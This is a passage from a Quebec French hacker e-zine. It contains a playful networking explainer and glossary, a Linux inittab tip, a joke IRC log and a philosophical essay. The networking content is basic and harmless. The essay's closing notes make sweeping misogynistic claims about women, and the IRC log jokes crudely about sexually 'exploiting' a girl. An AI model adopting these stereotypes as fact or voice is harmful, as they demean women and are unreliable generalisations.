autoroute de l'information (les anglais l'ont pas, avec information  highway
a veut rien dire; c'est de la marde l'anglais des fois ;-).

Level 4
Internet c'est en plus de savoir o c'qu'on envoit/reoit, savoir c'est quoi
qu'on envoit/reoit.

Level 5
Ce qu'on reoit et ce qu'on envoit, c'est parfois de la  communication  chez
les deux bords.. donc y faut rester "plugg" avec l'autre.

Level 6
C'est beau envoyer des bytes, mais souvent on veut  aussi  envoyer  d'autres
choses (aka des composs de bytes qui donnent du data..). C'est tape la est
complique, mais gnralement on s'en sacre! (pour vrai..)

Level 7
Mon ti programme quand je click sur le ti icne qui s'ouvre.  Mais  faut  un
protocole tablit pour que  l'autre  bord  d'Internet  (l'autre machine)  il
comprenne ce que mon ti programme lui a send.

Bon, maintenant c'tait quoi ces niveaux? Bien c'est les couches d'Internet,
une fois dissques. C'est gnralement appeles les couches du modle  OSI.
Pour tre clair on prend un pain et on le regarde en face.

       /\
       \        /
       |  lvl7  |
       |________|

Et oui, on voit juste le level 7...
Mais si on coupe le pain a donne :

                         /\
                         \ lvl1   /
                      /\  |
                      \ lvl2   /__|
                   /\  |
                   \ lvl3   /__|
                /\  |
                \ lvl4   /__|
             /\  |
             \ lvl5   /__|
          /\  |
          \ lvl6   /__|
       /\ |
       \        / |
       |  lvl7  |_|
       |________|

Voici donc le pain Internet.  8-)
On voit la croute, le level 7.

Maintenant c'est ici que vous allez comprendre ce que je veux dire :
Plaons les protoles avec les levels :
Level 7 : FTP, IRC, HTTP
Level 6 : j'ai dis tantot que tlm sen crissait... heh
Level 5 : RPC, SSL (malgrs que le monde sacre a dans level 6.. a pas de
          sens  mon avis)
Level 4 : TCP, UDP
Level 3 : IP, IPX
Level 2 : Ethernet, PPP
Level 1 : 0 pis 1 sur du cble stie.

Jusque la, je suis sure que presque tout le monde a comprit les acronymes
(ah les acronymes, plus que y'en a, plus que c'est leet).

Une switch : Travaille sur le niveau 2.
Un routeur : Travaille sur le niveau 3.
Donc, une switch a envoit les packets avec  peu  de  dcisions    prendre.
Maintenant, imaginons Internet (le pain) avec une bactrie qui  se  prommne
dans le pain (le packet) [note de Last: je tiens  m'excuser pour l'analogie
de mes deux avec la bactrie.. le pain ok. mais la.. hehe]  :

        Webserver          switch          routeur           routeur
       /\        /\       /\        /\
       \  (1)   /        \  (2)   /       \  (3)   /        \  (4)   /
       |  lvl7  |------->|  lvl2  |------>|  lvl3  |------->|  lvl3  |
       |________|        |________|       |________|        |________|
                                                                 |
                                                                 V
       Webbroswer          switch           routeur           routeur
       /\        /\       /\        /\
       \  (8)   /        \  (7)   /       \  (6)   /        \  (5)   /
       |  lvl7  |<-------|  lvl2  |<------|  lvl3  |<-------|  lvl3  |
       |________|        |________|       |________|        |________|

Ya deux chose  faire avec ce pain moisi la :
- Faire le portrait du packet une fois rendu  l'autre bout.
- Regarder le dessin, pis se dire que a ma prit 10 minutes  faire.

Bon donc voici notre information : 
C cute (disons que c du porn tien).
Maintenant le motton de  va devenir un paquet vue que le web  server(1)  le
pitche sur le net. Il va  donc  prendre  l'information  de  l'image  et  lui
rajouter une couche de plus de level 7, HTTP. Dans le cas prsent a  risque
d'tre un MIME TYPE ou une merde du genre.
Voici notre information avec une couche ajoute : (.
Aprs a le webserver est fut, y va savoir  qui l'envoyer et  va  rajouter
a dans le paquet, on rajoute donc une couche level 4 : {(
Maintenant qu'on a du IP, on peut ben mettre du level 2 pour que a se rende
plus loin que notre carte rseau : [{(
La switch(2) pogne a, et regarde le [ qui est metton du Ethernet.  Elle  se
dit "ouan ouan y cherche un petit pain avec une MAC address de  mme".  Elle
la trouve pas dans ses ports, elle s'en dbarasse au plus  criss    l'autre
routeur(3). Le routeur(3) regarde donc a et il se  dit  "ah  ok  le  gentil
packet veut aller voir cette adresse IP la"...  je  vais  voir  o  je  peux
l'envoyer. Il regarde donc dans ses tables, ainsi qu'autour de lui et dcide
de le passer au prochain routeur, qui le passe  l'autre {( et qui le passe
 la switch, qui dcide d'un air con et simpliste : ah cte packet la y va
dans cte cble la, bye : (
Pis la le webbrowser ouvre a, dcouvre qu'il  est  rcepteur  du  packet...
Dcode l'entte, wow c du http pour mon moi mme (, et affiche  une  paire
de fesses  l'cran (le porn la) : 

Bon la il y a plusieurs questions qu'on s'tait jamais pos auparavent :
A) Comment la switch fait pour savoir que c'est pas dans ses ports a la?
B) Comment le routeur sait o qui faut qui envoye le foutu packet sul net?
C) Pourquoi last, que t'engage pas qqn pour faire les ASCII  ta place?
D) Me reste tu du beurre de pinuts a ma donn envie de bouffer des beures
   de level 7 (j'aime la croute ;-)

Rponses :
A) Rsolution d'adresse : je l'ai tu dans ma table? sinon je call ARP! ARP!
B) Routage avec des protocoles : OSPF, BGP, RIP, EIGRP
C) Le pain maison c tjrs meilleur.
D) J'ai mme le choix entre du crmeux pis du avec des pinuts dedans.
E) Y'avait pas de question E, mais je vends dj le punch que ya un level
   2.5 pis que y ass marran... RSVP/MPLS!

Maintenant, on va aller voir un peu plus creux dans les choses...

Comme on l'a vu, notre packet ( reprsent par une bactrie  dans  le  pain,
[{( ) se fait constamment rajouter/enlever des informations supplmentaires
dans son entte. Cependant, les seules  informations  qui  sont  colles  au
packet sont des informations qui s'appliquent  celui-ci. Le packet ne  sait
pas tout, donc les lments de notre rseau doivent se  dmarder  entre  eux
mmes pour faire marcher le tout. Donc, parmis tout les  packets  TCP  et/ou
UDP qui se prommnent sur Internet (ou dans n'importe kel rseau digne de ce
nom), il y a d'autres packets, qui sont utiliss  uniquement  pour  que  les
composantes (les switchs et routeurs) puissent de dbrouiller. Je  vais  pas
full m'attarder sur les gros dtails de chaque foutu protocole, ni  sur  les
headers des packets de ceux-ci... et ce pour 2 bonnes raisons : a fait trop
de stock  dire et c'est platte en caltore. Mais bon, dans un futur  article
je vous promets un bon deep look sur un packet.. juste pour s'amuser :-)

/- On the side -/
Vu que j'ai tendence  rentrer beaucoup  dans  les  dtails,  veuillez  vous
rfrer  l'article "Internet++" pour plus de dtails, je vais mettre un (*)
aprs chaque affaire explique dans l'autre article.. Exemple : Pain brun(*)
/---------------/

ARP, Address Revolution Protocol.
Si vous voyez un packet un jour qui dit "Who has 24.20.50.53 tell 24.20.50.4"
c'est un paquet de ARP. Les paquets ARP sont  broadcasts(*)  sur  un  LAN(*)
Ethernet(*). Donc ce sont les switchs (level 2) qui propagatent a... en gros
a sert  savoir qu'elle est la MAC adress d'une telle adresse IP.   Le  but?
Pouvoir envoyer un packet directement au destinataire via Ethernet, on doit
savoir son adresse MAC... Bon alors ici on voit beaucoup de nouveaux mots, ou
de mots mal comprit :
Ethernet(*) : technologie de niveau 2, la plus utlis dans un LAN(*).
Adresse MAC(*) : aucun rapport avec MacDonald et les iMac, identifieur unique
d'un device Ethernet. Toute a pour dire que c'est pas trop compliqu : quand
le packet voyage dans une switch, la switch regarde la MAC adress, s'elle est
dans sa table de MAC adress (associe avec un port...  un  cable  de  plugger
sur la switch finalement) elle envoye le packet par ce fil la. voil.

Les routeurs ont la vie plus difficiles que les switchs. Il existe plusieurs
cas, qui doivent tre vues  plusieurs niveaux.   En  gros,  si  on  regarde
Internet, c'est une srie de rseaux  interconnects,  appells  AS(*).   Il
existe donc plusieurs protocoles permettant que tout  soit  rout  ensemble.
Bien qu'ils sont diffrents, ils finissent par toute faire la mme genre  de
job, y dpendant du niveau. Lorsqu'on relit deux rseaux ensemble,  on  fait
appel  des protocoles "border gateway", BGP(*) par  exemple.   Dans  chaque
rseau, il existe des protocoles internes de routage, OSPF(*) et RIP(*)  par
exemple. Tout ces protocoles font une chose en commun : remplacer une  route
statique. C'est donc de cette facon que le routage est  "dynamique"  et  non
"statique"... Rendu  ce point ici de la comprhension, on a  qu'a  se  dire
que chaque protocole fait sa job  son niveau. Gnralement chaque protocole
a une table de routage,  et  la  tien  update   l'intrieur  de  tout  les
routeurs de son rseau et peut la changer  en  temps  rel  selon  certaines
contraintes. C'est pour cette raison que  dans  la  plupart  des  protocoles
internes, on doit tablir une connexion de voisin(neighbor en anglais) entre
les diffrents routeurs, pour qu'ils  savent    quoi  ils  sont  rellement
pluggs. Ces derniers procotoles, servent donc   donner  de  l'intelligence
aux routeurs : ils savent o envoyer le packet. On peut aussi faire en sorte
que le packet se fasse guider lui-mme. Un router peut ajouter  en  haut  du
packet diffrents champs qui lui permettent de se guider par lui mme parmis
les routers... m'enfin, le router va regarder ce que la packet a  dire  sur
la route  suivre.. Vu que le monde sont crazy, y faut  que  les  protocoles
qui rgissent a soient sur le layer 2.5. On a donc par exemple MPLS(*), qui
dfinie l'entte  placer, et RSVP(*) qui s'occupe de rserver le  chemin  
prendre par le packet. Avec des trucs comme a, on peut  donc  faire  de  la
rversation de bandwith par exemple et prommener nos packets dans un  tunnel
cr par ces protocoles... c fou hein? ;-)

La vous venez de voir que je passe a travers une chose rapidement  et  d'une
faon trs condense. Et bien j'ai pas le  choix,  ya  tellement  de  choses
diffrentes, que si je m'attardais toujours j'aurais pas  fini...  mais  bon
je crois que ce texte a pu donner une trs bonne ide de  ce  que  ressemble
"Internet"  un niveau plus  bas  que  celui  que  les  gens  sont  supposs
appercevoir...

Pour les futs en rseautique qui cherchent le  boutte  ouss  que  je  vais
parler de subnetting et toute a et bien  vous  pouvez  pratiquement  passer
votre chemin.. j'ai pas envie d'en parler, heh. Par contre,  allez  voir  le
petit supplment d'article, je vais parler de ce qu'est un netmask(*)  ainsi
que les classes(*)! Tant qu' faire on va regarder aussi  le  TCP(*)  et  le
UDP(*). Pis en prime (comme si c'tait pas ass), le ICMP(*) m'intrigue moi.

Dans le prochain ezine on va laisser de cot un peu la thorie pour faire de
la pratique. On va mettre  nue un packet, et regarder des commandes  CISCO.
a risque d'tre intressent comme surtout aprs avoir lu la thorie ici.

Greetz : 
- GATTI pour les bires d'aujourdhui (discuter de rzo avec dla bire c fun)
- SOulette pour tjrs m'estiner et m'en montrer
- Le pain italien pour m'avoir servi de modle pour mes ASCII ainsi que de
  fond de nourriture.

                                                                 



 _____     _ _ ______________ _ __ __ _ _________ _ _ _______________
|     |\  |                                                          |\
| EOF | | | LastCall_                          lastcall@mindkind.org | |
|_____| | |__ _ ________ _______________ ___________________ ________| |
 \_____\|  \____________ _____________________________________________\|




        ____         ,-------------------------------------------------
       /    \        | Vous etes le genre de fucking retard qui s'habille
      |  _   |       | en cagoule blanche et qui burn tout ceux qui
      | / \  |       | utilise un gui ? Vous voullez tirer le maximum de
      ||   | |      /  vos console linux, mais 6 a la foi cest pas uber
      (.) (.)|     /   multitask hein. Et bien ne desesperez pas il existe
      ||   | |    <__  une facon de booster le nombre de tty a 11 voir 12.
      ||   | | |     | Ca bouffe un peu plus de memoir, mais franchement
      ||   | | |     | ca atteind pas le levhell de winXP. Voici comment
      |____/|| |     | procd:
      |\___/ | |     |  
      ||   | | |     |  l'aide de votre editeur de text prfr (pico),
      ||   | | |     | ditez (on s'en doutais) le fichier /etc/inittab
      ||   | | |     | vous devriez trouver a l'interieur les lignes  
      ||     | |       suivante (quelque par vers la fin)
      | \___/  |      
      |        |       c1:1235:respawn:/sbin/agetty 38400 tty1 linux
       \______/        c2:1235:respawn:/sbin/agetty 38400 tty2 linux
                       c3:1235:respawn:/sbin/agetty 38400 tty3 linux
                       c4:1235:respawn:/sbin/agetty 38400 tty4 linux
                       c5:1235:respawn:/sbin/agetty 38400 tty5 linux
                       c6:12345:respawn:/sbin/agetty 38400 tty6 linux

                       1ere etape : modifier la ligne 

                       c6:12345:respawn:/sbin/agetty 38400 tty6 linux

                       pour

                       c6:1235:respawn:/sbin/agetty 38400 tty6 linux

                       et ajouter les lignes suivante

                       c7:1235:respawn:/sbin/agetty 38400 tty7 linux
                       c8:1235:respawn:/sbin/agetty 38400 tty8 linux
                       c9:1235:respawn:/sbin/agetty 38400 tty9 linux
                       c10:1235:respawn:/sbin/agetty 38400 tty10 linux
                       c11:12345:respawn:/sbin/agetty 38400 tty11 linux

                       Pourquoi 11 et pas 12 ? he bien si vous utilisez
                       Xfree, vous allez etre content de pouvoir faire
                       alt-f12 pour retourner a X si vous avez decidez
                       de revenir en console sans killer X pour une 
                       raison disons X. Si vous en voullez douze, vous
                       navez qua rajouter une ligne 11 identique a la
                       10 et a incrementer la 11 de 1 (11 + 1 = 12)

                       si vous etes lache, eviter de faire un cut paste
                       des 5 premieres ligne pour les rajouters a la 
                       fin, ou si vous le faites assurez vous de donner
                       le bon chiffre apres le "c" pour qu'il n'y en
                       ai pas en double, car il va caster 2 login dans
                       le meme tty et ca devien impossible de se logger.




                                                               _________
 _ _ _______________ ___________ _______ MindKind10 __ _ __ __/        /
|                                                            /        /
| Internet++, by LastCall_                                  / 10.7   /
'          aka: Need input, Steph-an-ie!                   .  ----- /
 \_ _______ ______ _____ __ __ ___________ _______________/        '
                                                         /________/


( supplment (non-vitaminaire)  mon autre article)

Pain blanc ou pain brun?
L'important c'est d'tre en sant.. mais ne jamais mlanger du pain  brun  avec
de la moutarde de Dijon, c 2 fois plus dgeux.

Si vous avez pas comprit le but du pain dans cette  histoire,  c'est  que  vous
n'avez pas lu "Internet esspliqu"  (mon  autre  article  sur  Internet).   Cet
article ci est juste un petit supplment  d'informations  sur  le  mme  sujet.
Un glossaire en quelques sortes. Par contre, pensez pas que je vais aller  dans
le fin creux des choses! Le but de mes articles c'est d'esspliquer  les  choses
simples. Cet article complmentaire, bien que plus en dtails, va rester simple
Je vais mettre des links (facilement trouvable sur google!) pour plus  d'infos.

MAC
   Media Access Control
   C'est pas trop complexe, c'est un identifiant unique de 48bits de long qu'on
   donne aux interfaces dans un rseau. Sur un rseau Ethernet, il ne faut  pas
   avoir 2 destinations (la MAC address donc) semblable, sinon les 2 interfaces
   avec la mme MAC address ont de fortes chances de recevoir  les  packets  de
   l'autre. L'IEEE  s'occupe  de  distribuer des dbuts de MAC address  chaque
   constructeur et ensuite eux se dbrouillent pour le reste.   Pour  la  liste
   complte de ta aller la : http://standards.ieee.org/regauth/oui/index.shtml
   Pour savoir votre MAC dans Windows : "ipconfig /all"
   et dans unix : "ifconfig -a"
   Pour faire une recherche de MAC adress : http://coffer.com/mac_find/
   Ne vous trompez pas : http://www.ifrance.com/confianceenmcdo/img7.gif
   
Ethernet
   Si on regarde ce protocole la selon son level (2), on comprends vite   quoi
   il sert. Utilis pour les LAN, Ethernet permet  de  transfrer  des  donnes
   sans tre PPP(point-to-point protocol, quand y'a juste un fil  direct  entre
   les deux interfaces relies ensemble).  Y'en  aurait  beaucoup    dire  sur
   Ethernet, car il est de loin le protocole le plus  utilis  pour  les  LANs.
   Mon premier hit sur google ma amen au URL suivant :
                   http://www.ethermanage.com/ethernet/ethernet.html
   Si vous cherchez comme faut, vous allez tomber sur LES documents PDF de 20Mo
   du IEEE http://standards.ieee.org/getieee802/portfolio.html?agree=ACCEPT
   Par contre vous allez voir avec HORREUR qui manque  le  premier  document...
   Ne stresser pas, le voici : http://mindkind.org:8787/ieee/
   Si jamais plus tard le IEEE capote, envoyer un email  abuse@mindkind.org on
   va s'arranger pour mettre le document que vous voulez online!

LAN 
   Local Area Network
   Simple. C'est pas un WAN (wide area network) ni un MAN  (metropolitain  area
   network). La seule diffrence entre un LAN pis Internet c'est  que  c'est  
   une plus petite chelle. Du genre, je suis connect sur un  LAN  qui  m'aide
     me  connecter  sur  Internet...    Lorsque  je  me  promne,   je   sors
   gnralement de mon LAN via un routeur. Aussi, d'habitude  un  LAN  contient
   un seul network. Donc tout le monde voit les broadcasts de  tlm,  etc.  Bien
   que n'importe quoi peut marcher comme adresse IP si le LAN est ferm, il en
   est pas de mme quand il est link sur Internet, on donc 3 choix disponibles
   10.0.0.0/8, 172.16.0.0/12 et 192.168.0.0/16. Lien platte qui dit rien dl'fun
   mais qui confirme mes dires : http://www.isi.edu/in-notes/rfc1918.txt
   
AS
   Autonomous System
   Rien de trop technique non plus.. c'est juste un endroit qui dsigne un mme
   network.. ben plutt un network administrer par la mme "personne". Du genre
   je peux avoir plusieurs networks dans mon AS, mais c'est toute moi qui  s'en
   occupe.. sur Internet les AS sont own par des grandes compagnies (UUNET).
   
IGP
   Interior routing protocol
   on peut dire que OSPF et RIP sont des IGP. criss c plein dacronymes!
   
OSPF
   Open Shortest Path First
   IGP de routing dans un rseau. Permet  de  choisir le  path  le  plus  court
   pour envoyer des packets, et ce avec tout plein de contraintes  (pour  faire
   du trafic engineering). Un routeur qui roule OSPF  une  database  de  liens
   spreads sur le network (LSA, Link State Advertisement).  Il  s'occupe  dans
   son temps en checkant si les routeurs connects  lui-mme  sont  encore  la
   et spread l'information. Bien sre, il calcul le chemin le plus  court  pour
   une route avec l'aide de l'algo SPF! ouf. Y'a aussi ISIS qui  fait  la  mme
   chose (avec SPF), mais le protocole ne lui ressemble pas...  RFCs :
   http://www.ietf.org/rfc/rfc1583.txt http://www.ietf.org/rfc/rfc2328.txt
   
RIP
   Routing Information Protocol
   IGP de routing (nonnnnn :-P) dans un rseau (y'a tu  ailleurs  que  dans  un
   rseau qu'on route??). Je le connais pas pentoute, mais je  sais  que  CISCO
   s'en sert... donc a doit tre bon. Ou ben justement  y'a  juste  CISCO  qui
   le connat fak y peut-tre pourri pis on sait pas! M'enfin, link:
   http://www.cisco.com/univercd/cc/td/doc/cisintwk/ito_doc/rip.htm
   
MPLS
   Multi-Protocol Label Switching
   Rapidement, c'est un protocole qui rajoute un header  notre packet  et  qui
   lui dit o aller... Par lui mme, ce protocole  fait  rien  d'autre  que  de
   rajouter le header, mais a vaut pour un paquet  d'autres  protocoles,  dont
   RSVP... http://www.mplsrc.com/
   
RSVP
   ReSerVation Protocol
   Mettons qu'on veut tre sure de notre coup quand on fait de quoi  sur  notre
   network, ben on utilise RSVP. Hein? On appelle a du QoS  Quality of Service
   a permet de faire de la rservation de bandwidth pour tre sr  de  pas  en
   manquer. C'est bcp utilis en tlphonie IP, car on a besoin d'une bandwidth
   constante. RSVP permet  donc  de  crer  des  tunnels,  de  rserver  de  la
   bandwidth pour ces derniers dans le but de faire voyager les packets dedans.
   Fun.
   
Netmask
   Utilis pour dcrire la porte d'un rseau, le netmask  peut  s'exprimer  de
   deux manires, mais dans les 2 cas a revient  la mme chose. /32 veut dire
   une seule adresse dans le rseau, ce qui revient au mme que 255.255.255.255
   /24 revient au mme que 255.255.255.0. Avez vous saisit  la ?   /30  devient
   255.255.255.252. Fun fun. Maintenant voici la  faon  binaire  de  voir  les
   choses : 11111111 11111111 11111111 00000000 c'est 255.255.255.0 Un  netmask
   peut juste avoir des bytes 11  gauche et des 0    droite,  donc   11111111
   11111111 00000111 11111111 a se peut pas (c'est 255.255.7.255). Maintenant,
   si on fait le lien, le /24 revient au nombre de 1 dans le netmask...  j'sais
   binaire wahou. (voir link  la fin de "Classes")
   
Classes
   On spcifie un range de IP pour un network avec des classes.   En  gros,  a
   permet de sparer 255.255.255.255. On parle de 3 sortes de classes, A, B pis
   C. A commence de 0.*  127.*, B 128.*  191.*, C 192.*  223.* Pour le reste
   y'a des classes D pis E mais ils sont utilises juste pour  des  shits.   Au
   dbut d'Internet on pouvait juste acheter une classe, donc quand t'avais une
   classe A, t'avais TOUTE les maudits IP de ta classe.. ce  qui  est  bcp trop
   pour n'importe qui. Donc on a commencer  attribuer  les  adresses  IP  sans
   tenir compte seulement des classes. Trs bon URLs explicatifs :
   http://www.pku.edu.cn/academic/research/computer-center/tc/html/TC0302.html
   et TC0303.html du mme dbut d'URL.
   
TCP
   Transmission Control Protocol
   Le contrle de transmission... non c'est pas un  protocole  pour  ta  Civic.
   C'est plutot pour qu'on soye vraiment sr et certain que nos packet se  sont
   rendus.. Comment on fait a? ben on s'arrange pour crer une connexion entre
   deux machines avec des rponses. Du genre, je veux un TCP sur ton  port  12,
   tu fait ACK (acknoledge, ok), tu fais ok j'arrive, y refait ACK.  Pour  tre
   sr de pas se faire fourrer, il attribut des numros  de  squence    cette
   conversation. TCP est vraiment de quoi de le fun, qui mriterait un  article
    part entire (surtout que y'a plein de technique de hack  intressantes  
   faire avec a! [ack, hack.. la pogne tu.. heh]). RFC 793 pour les intresss
   (y vieux). http://www.faqs.org/rfcs/rfc1180.html me semble pas pire..
   
UDP
   User Datagram Protocol
   On construit des packets qu'on pitche  un host, appel  datagram  (ouf).  
   part de dire que c'est un peu comme TCP sauf que lui ya pas de ACK, j'ai pas
   grand chose  dire sur UDP... http://www.faqs.org/rfcs/rfc768.html (Last  et
   l'art de s'en sortir avec un RFC.. heh)
   
ICMP
   Internet Control Message Protocol
   http://www.ietf.org/rfc/rfc792.txt
   haha
   bon ok j'vas pas que faire une rfrence.. Wyze va me chier dessus :-P  ICMP
   c'est un protocole tabli pour envoyer des packets d'autres types que TCP et
   UDP.. disons que a sert juste  envoyer des messages,  pour  le  fun.   Par
   exemple lorsque qu'on envoie un PING dans le but d'avoir  une  rponse  pour
   mesurer le temps que a prends, ben en envoi en  fait  un  ICMP  de  type  8
   nomm ECHO, dans le but de recevoir la dite rponse! Pour les types de ICMP:
   http://www.cotse.com/icmptypes.html
   
Broadcast
   Terme souvent utilis pour dire qu'on envoie    tout  les  hosts  de  notre
   rseau la mme chose. Par exemple un ARP request est broadcast   tout  mon
   LAN dans le but d'avoir une rponse d'une des machines sur le LAN, mais sans
   savoir son adresse IP. Aussi on peut appeler broadcast une adresse  Internet
   qui se termine par 255 (genre 177.1.1.255). Cette adresse sert de  broadcast
   vers les autres de son rseau (metton de 177.1.1.1  177.1.1.254).

Unicast, Multicast
   Facile facile, ce sont deux contraintes qui veulent dire respectivement  que
   tu envois  un seul et unique host et que tu envois  plusieurs hosts. 

Bon, fini avec cet article d'acronymes la, j'ai t aussi  rapidement  que  mon
autre article, paske dans ce cas la si vous voulez tout plein de dtails, aller
voir les links, ou ben arrangez-vous sur google! un peu de  dbrouillardise  a
tue pas personne.. :-P





 _____     _ _ ______________ _ __ __ _ _________ _ _ _______________
|     |\  |                                                          |\
| EOF | | | LastCall_                          lastcall@mindkind.org | |
|_____| | |__ _ ________ _______________ ___________________ ________| |
 \_____\|  \____________ _____________________________________________\|


   < Mindkind tales from IRC >
   
   [20:49] <LastAWAY_> moi pis wyzeman on a invent un device 'Mindkind
   [20:49] <LastAWAY_> ctun implant crbrale avec un microchip
   [20:50] <LastAWAY_> le microchip soccupe de remplacer le plaisir sexuel,
                       avec l'criture d'article undergroune
   [20:50] <[FunkY]> LastAWAY_: kewl
   [20:51] <LastAWAY_> ya qq bugs
   [20:51] <LastAWAY_> genre pendant que tu baise ta le gout d'exploiter la fille
   [20:51] <[FunkY]> comme les souris qui se tue en pesant sur un piton qui leur
                     shoot de l'endorphine pure? :]
   [20:51] <LastAWAY_> pis ta tendence a double cliquer le sein droit
   [20:51] <LastAWAY_> too
   [20:51] <LastAWAY_> ah pis a la t aussi rpertorier que le monde demandait
                       a leur blonde "tu veux que jchte payload inject a soir?"
   [20:51] <LastAWAY_> mais a part sa
   [20:52] <LastAWAY_> c ok (on pense)
   [20:52] <LastAWAY_> [FunkY] c pire
   [20:52] <LastAWAY_> [FunkY] tcris, tu jouie.
   [20:52] <[FunkY]> kewl

  < ----------------------- >
  
                                                               _________
 _ _ _______________ ___________ _______ MindKind10 __ _ __ __/        /
|                                                            /        /
| /WHOAMI vs. /WHOAREWE ?, by H3                            / 10.8   /
'          aka: Cherchez pas a comprendre                  .  ----- /
 \_ _______ ______ _____ __ __ ___________ _______________/        '
                                                         /________/



                       .________________.
                       |6       9|
                       | _------     ----_|
                       |`.________ _  .`|
                       |o   o8@o@8o    ||
                       |  .8  o8*` o 8  ||
                       | o  *        *o || 
                       | 8.  `MindKind 9/ |
                       | 8 ` ,` ` ,.;/} |
                       |  8o. .,.`o8/,` |
                       |o  `(8o88o*90/   /|
                       |  o     `*`*/   / |
                       |   O   O  8/   /  |
                       |o       o /   /   |
                       | O ___ _/    \h3|
                       |._`_____/      \.|
                       `*.______________.*`










#include fautes.fr

pre f  a  c  e. . .
	
      Salutations.  Mon nick  est h3 *historique; non sa veux rien dire. 
aprs  1 ans  sur  irc  avec des  nick  plus fashion  les  uns  que  les 
autres j'en suis venu  la  conclusion que le nick qui me reprsenterait
le mieux  serait un  nick qui ne veux rien dire. Quoi de plus dbile que 
d'tre jug  partir d'un  mot de 1  9 caractres qui est suppos  nous 
reprsenter..  le  faits  est  que  personne  ne  prend  de nick qui les 
reprsentent,  ils  ne  font  que  s'identifier    quelque chose qu'ils 
croient  *hot* pour  attirer le plus de personnes  du mme type  qu'eux.
pour  cette  raison  j'ai dcider  de choisir un  nick qui laissrait une 
interpretation  diffrente pour  chacun.  L'imaginaire  de  l'homme  est 
vaste, probablement  plus  que l'univers, car  c'est le  seul endroit ou 
2+2  peuvent  donner 3.  bref sa marche, l'integration dans divers clans 
sociaux est  beaucoup plus  simple si  l'on n'est pas  jug  au  premier 
coup  d'oeil, mais  plutot  associ    quelque  chose  de   son  propre 
imaginaire,  ou   mme   quelque chose  d'inconnu  (l'humain  aime bien 
tre intriguer, pkoi ?, el c tu sti.) ;historique eof*

	J'ai dcider d'crire cet article aprs avoir relu le mindkind01
(qui m' charmer avec son humour  propre au  kbec  ircen et la qualit
des articles, j'avais dj lu quelques iga que j'avais bien aimer aussi,
mais avec  mindkind  je crois que la maturit  porter fruit pour donner 
lieu un e-zine qubecois de qualit) 

	L'article #09 "nothing94's Pessimism" de nothing94. Un  article 
plutt suicidaire, mais qui  ma  toucher.  L'auteur  pose des  questions 
existencielles    un public invivisible sur le sens de la vie et  notre 
raison  d'tre  en  tant  qu'tre  humain  "pensant".  Il en  vient  la 
conclusion plutt  sombre mais vrai que notre seul raison  d'tre est de 
mourrir.

"L'ignorance est le plus beau cadeau que  vous pouvez obtenir sur terre.
Vaut mieux ne rien savoir que de voir du noir partout."

	Sa phrase rsume ass bien ou je veux en venir. L'tre humain est
probablement le seul tre pensant de l'univers connu actuel. Mais non pas
le seul  tre  vivant.  L'homme  est entour` d'tres vivant, mais il est
seul.  Seul    savoir,  et  ne pas savoir. L'homme est conscient de sont
existance. Mais il  besoin de savoir pourquoi il est, pourquoi il existe.
Pendant l're  prhistorique  l'homme ne devais certainement pas avoir le
temps de penser  ses choses la, plus tard ils rpondrent  ces questions
existenciel  avec la  religion et  diverses croyances  populaires, ce qui 
semblait rassurer le monde  et le fait encore. Quand  je  vous disais que 
l'imaginaire de l'homme tait  vaste, il n'est pas seulment vaste, il est 
puissant. Il permit  deraliser  de grande choses,  comme  les pyramides, 
tout  ca  parce  qu'un homme  croyait qu'il  vivrait ternellement si  il
le fesait. bon p-e un jour j'ferai un article intitul "comment cathalyser
l'imaginaire  humain pour  conqurir  le  monde  for  dummies", mais pour 
l'instant revenont   nos  questions existenciels.   quoi bon exister si 
c'est pour mourrir  ?  quoi  sert la vie ? Personnellement j'crois qu'il 
ne faut  pas y  chercher de  sens, visiblement  nous avons t concu pour 
survivre, "la  vie trouvera son chemin" comme y disent dans jurasic park, 
peu importe  ce que  l'on dis  sur  notre "fragillit", on n'est l'un des 
parasite les plus rsistant qui ronge notre planete.

	Rcament je  me suis poser les question que l'auteur nothing94 se
pose dans sont  article, et  ce  sans  avoir lu sont article (raison pour 
laquelle il  ma  toucher  d'ailleur) J'en  suis  venus  un poil prs aux 
mmes  conclusions, sauf que j'suis p-e de nature un peu moin pssimiste. 
J'crois  pas que   l'on aye  de  raisons d'tre  particulire,  le  monde 
coutent trop  la tv. Notre  seul but  inn  est  de  survivre  et  de se 
reproduire (btw, la testostrone  est un poison amre que les femelles ne 
comprendront jamais)

	Prsentement on n'est au stade; bon,  on c'est reproduit en masse 
jusqu' spoiler notre gene pool, ya pu grand choses a craindre pour notre
survie venant d'la nature et je ne crois plus en rien, pkoi chu la asteur?
j'ai pas  plus la rponse, et probablement qu'il y'en n' pas. On se fait
chacun nos  buts,  car nos  ralisation  on un impact  relatif sur  notre 
univers  immdia   et sa  nous  donne l'impression  que l'on  est la pour 
quelque chose et que nous avons un but, que l'on existe pas pour rien.

	Le vide et l'inconnu sont deux chose qui font peur  l'homme, p-e
qui faut juste arrter d'avoir peu pis d'se poser des questions sur notre
raison d'tre. Personnellement  je me  suis rendu  l'vidence devant les 
faits que personne,  depuis  que  l'homme  est  homme et que la femme est
folle, avait  trouver  de rponse "valable" (selon moi)  notre existence 
et que je  ne  serais surement pas celui qui en trouvra une. Pour ma pars
j'ai choisis  l'art  pour  m'vader d'la pression social et des questions
sans rponses, l'art a fait  grandir  l'esprit  humain depuis la nuit des
temps et c'est probablement l'art visuel qui  su developper  la  facult 
d'abstraction de l'homme jusqu' ce qu'il puissent comprendre des concepts
aussi  abstraits que la  relativite, mais bon, c'est un opinion. Mais de 
tout temps l'art  influencer l'homme au plus au point, et c'est 
indniable.

conclusion. aka; y j'ai trouver un but a ma vie!

	Chatouiller, provoquer, perturber  l'imaginaire  humain. Peu-tre 
qu'un jour quelqu'un  fera de grandes  choses aprs avoir t toucher par 
mon art.                                                                 



note personnel:   l'une des  diffrence  marquante entre un ordinateur et
                  l'homme ,   c'est    la capacite    que    l'homme   
                  d'assimiller   une  valeur   fondamentale, ron,  sans 
                  perturber  sont  fonctionnement  (mental) ou "crasher", 
                  encore  la  on pourrais  p-e associ une  psychose  un 
                  "mental crash". eheh.  En d'autres  mots l'homme rpond 
                  aux questions qui  peux  rpondre  pis  l'reste,  si  y 
                  connait pas la rponse y bullshit sa.

note personnel 2: L'une des   diffrence  marquante entre  l'homme et  la 
                  femme, c'est la capacit  que l'homme  de remplacer la 
                  dite valeur  "rone"  par  une  vrite, ou une valeur 
                  plus prs de la vrite. La femme continura  d'affirmer
                  qu'elle dtient la vrit absolue.


  .-------------------------------------------------------------------.
  |~inspirations & greetz in chronological order~                     |; 
  | -life                                                             ||
  | -thetrahydrocanabinol                                             ||
